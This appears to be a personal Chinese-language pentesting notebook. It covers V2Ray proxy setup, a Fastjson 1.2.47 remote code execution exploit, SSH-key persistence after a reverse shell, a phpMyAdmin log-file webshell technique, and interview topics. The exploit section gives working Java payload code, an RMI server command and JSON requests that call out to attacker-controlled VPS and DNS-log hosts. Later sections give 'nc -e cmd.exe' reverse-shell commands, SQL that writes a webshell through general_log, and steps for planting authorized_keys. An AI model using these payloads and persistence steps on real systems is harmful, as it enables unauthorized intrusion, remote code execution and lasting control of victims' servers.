V2Ray搭建

referer:https://www.stackcc.com/2019/04/02/v2raysetup/

centos7 安装
#安装
wget https://install.direct/go.sh
yum install zip unzip
bash go.sh
#启动
systemctl start v2ray
#配置
vi /etc/v2ray/config.json
#停止防火墙
systemctl stop firewalld

centos6
https://www.mzihen.com/a-new-way-to-bypass-the-gfw/

service iptables stop
service v2ray restart

卸载方法
service v2ray stop
chkconfig v2ray off
rm -rf /etc/init.d/v2ray
rm -rf /etc/v2ray (配置文件)
rm -rf /usr/bin/v2ray (程序)
rm -rf /var/log/v2ray (日志)

#查看开放端口及id
cat /etc/v2ray/config.json

客户端下载
win
https://github.com/2dust/v2rayN/releases
macos
https://github.com/Cenmrev/V2RayX/releases

Fastjson 1.2.47 远程命令执行漏洞

#referer https://vulhub.org/#/environments/fastjson/1.2.47-rce/

1、生成编译攻击脚本Exploit.class #大坑,z centos上编译java,受java版本影响,目前在linux下 java version “1.8.0_141” 版本编译成功

将下面代码保存为:Exploit.java
然后执行:javac Exploit.java,生成class文件

import java.lang.Runtime;
import java.lang.Process;
public class Exploit {

    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec("ping fastjson.t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org");
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }

}

2、在vps上执行,启动一个rmi服务**
Exploit.class 放到vps根目录 ,使得 http://vps.0535code.com/Exploit.class 可以直接访问
#然后下载 marshalsec-0.0.3-SNAPSHOT-all.jar 在vps执行
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://vps.0535code.com/#Exploit”
#rmi服务默认只开放1099 端口

3、构造 payload:
在头中增加 content-type:application/json ,去掉 其他冗余字段 Accept:*****

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://vps.0535code.com:1099/Exploit",
        "autoCommit":true
    }
}

或者

POST  / HTTP/1.1
Host: 192.168.8.128:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept-Encoding: gzip, deflate
content-type:application/json
Content-Length: 195

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://111.38s7vp.ceye.io/TouchFile","autoCommit":true}}

ssh免密登录笔记

反弹shell 无法使用 vi编辑文件,又不知道机器的root密码,修改和添加用户动静较大,维持shell还是添加免密登录公钥,使用私钥登录。

 

随便找一个linux机器执行 ssh-keygen -t rsa生成rsa密钥, 一路回车(无密码)
会生成2个文件
.ssh/id_rsa.pub #公钥,多台机器可以公用一个公钥
.ssh/id_rsa #私钥
把.ssh/id_rsa.pub 公钥 拷贝 或者 wget下载到 /root(当前用户)/.ssh 目录下, 如果没有.ssh 目录则 mkdir .ssh

完事后,配置目标机器后用xshell链接就可以了
cat id_rsa.pub >> authorized_keys && chmod 600 authorized_keys

备注 iptalbe 添加防止ip反向链接及删除规则:

iptables -A OUTPUT -d 103.241.50.57 -j DROP
iptables -L –line-numbers
iptables -D OUTPUT 1

phpmyadmin set general_log_file getshell

#查看是否有写文件权限
show global variables like ‘%secure%’;
#select ‘‘ into outfile ‘C:/phpStudy/www/o.php’;

#查看日志文件存放路径及开启
SHOW GLOBAL VARIABLES LIKE ‘%general_log%’
set global general_log = ON

#根据上面返回的日志位置,猜出web路径,设置日志文件
SET global general_log_file=’C:/phpStudy/WWW/1.php’;
#或者访问0.0.0.0/phpinfo.php 可能看到web绝对路径

#执行sql语句
SELECT ‘‘;
SELECT ‘‘;

#下载 nc 或者直接使用菜刀
https://eternallybored.org/misc/netcat/
#nc反弹 cmd
nc -vv -l -p 端口号 #本机
nc -e cmd.exe 监听主机IP地址 端口 #服务器

#####
SET global general_log_file=’C:/phpStudy/PHPTutorial/WWW/1.php’;
SELECT ‘

不同维度面试安全工程师广度和深度

主机漏洞:提权漏洞、脏牛、bash破壳、幽灵(组合利用姿势)
框架漏洞:Thinkphp、Sprint、Struts2等
中间件漏洞:IIS、Apache、nginx、tomcat、weblgic、JBoss、docker、ImageMagick;
WEB漏洞:sql注入、xss、跨域漏洞、csrf、ssrf、盲注命令执行、XXE、反序列化(原理、检测方法、利用饶人技巧、修复方案)
APP漏洞:常见漏洞、关注点,webview组件漏洞
代码审计:审计思路,遇到的多个pop链和函数特性
内网渗透:内网常见漏洞,如何判断域控主机,拿到域内机器后思路
SDL流程:在那些节点实战过,业务紧急上线怎么做SDL
最近漏洞:关注的新漏洞及原理